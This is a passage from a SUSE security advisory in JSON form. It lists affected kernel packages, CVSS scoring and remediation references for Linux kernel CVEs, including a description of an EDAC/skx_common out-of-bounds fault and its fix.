"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-38297"
},
{
"cve": "CVE-2025-38298",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-38298"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nEDAC/skx_common: Fix general protection fault\n\nAfter loading i10nm_edac (which automatically loads skx_edac_common), if\nunload only i10nm_edac, then reload it and perform error injection testing,\na general protection fault may occur:\n\n mce: [Hardware Error]: Machine check events logged\n Oops: general protection fault ...\n ...\n Workqueue: events mce_gen_pool_process\n RIP: 0010:string+0x53/0xe0\n ...\n Call Trace:\n \u003cTASK\u003e\n ? die_addr+0x37/0x90\n ? exc_general_protection+0x1e7/0x3f0\n ? asm_exc_general_protection+0x26/0x30\n ? string+0x53/0xe0\n vsnprintf+0x23e/0x4c0\n snprintf+0x4d/0x70\n skx_adxl_decode+0x16a/0x330 [skx_edac_common]\n skx_mce_check_error.part.0+0xf8/0x220 [skx_edac_common]\n skx_mce_check_error+0x17/0x20 [skx_edac_common]\n ...\n\nThe issue arose was because the variable \u0027adxl_component_count\u0027 (inside\nskx_edac_common), which counts the ADXL components, was not reset. During\nthe reloading of i10nm_edac, the count was incremented by the actual number\nof ADXL components again, resulting in a count that was double the real\nnumber of ADXL components. This led to an out-of-bounds reference to the\nADXL component array, causing the general protection fault above.\n\nFix this issue by resetting the \u0027adxl_component_count\u0027 in adxl_put(),\nwhich is called during the unloading of {skx,i10nm}_edac.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-38298",
"url": "https://www.suse.com/security/cve/CVE-2025-38298"
},
{
"category": "external",
"summary": "SUSE Bug 1253079 for CVE-2025-38298",
"url": "https://bugzilla.suse.com/1253079"
}
],
"remediations": [
